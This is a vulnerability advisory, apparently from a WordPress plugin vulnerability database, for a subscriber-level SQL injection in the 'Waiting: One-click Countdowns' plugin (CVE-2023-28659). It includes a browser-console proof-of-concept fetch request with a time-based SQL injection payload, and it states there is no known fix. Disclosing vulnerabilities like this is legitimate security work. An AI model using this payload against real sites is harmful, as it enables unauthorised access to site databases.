Waiting: One-click Countdowns <= 0.6.2 – Subscriber+ SQLi | CVE 2023-28659 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the pbc_down[meta][id] parameter before using it in a SQL statement via the pbc_save_downs AJAX action, leading to a SQL injection exploitable by any authenticated users, such as subscriber

Proof of Concept

Run the below command in the developer console of the web browser while being on the blog as subscriber user

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=pbc_save_downs&pbc_down[meta][id]=1+OR+(SELECT+1+FROM+(SELECT(SLEEP(1)))a)--',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Affects Plugins

No known fix

References

CVE

URL

https://www.tenable.com/security/research/tra-2023-2

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Joshua Martinelle (Tenable Research)

Verified

No

WPVDB ID

c89eae1a-b8d8-4af1-bd6d-5a9a326faad6

Timeline

Publicly Published

2023-03-22 (about 2 years ago)

Added

2023-03-23 (about 2 years ago)

Last Updated

2023-03-23 (about 2 years ago)

Other

Published

Title

Published

2024-10-13

Title

ShortPixel Image Optimizer < 5.6.4 - Authenticated (Editor+) SQL Injection

Published

2023-04-05

Title

Slimstat Analytics < 4.9.4 - Subscriber+ SQL Injection

Published

2025-05-22

Title

Pixel WordPress Form BuilderPlugin & Autoresponder < 1.0.3 - Unauthenticated SQL Injection

Published

2025-07-24

Title

ProfileGrid < 5.9.5.4 - Authenticated (Subscriber+) SQL Injection

Published

2022-11-07

Title

WP User Merger < 1.5.3 - Admin+ SQLi via wpsu_user_id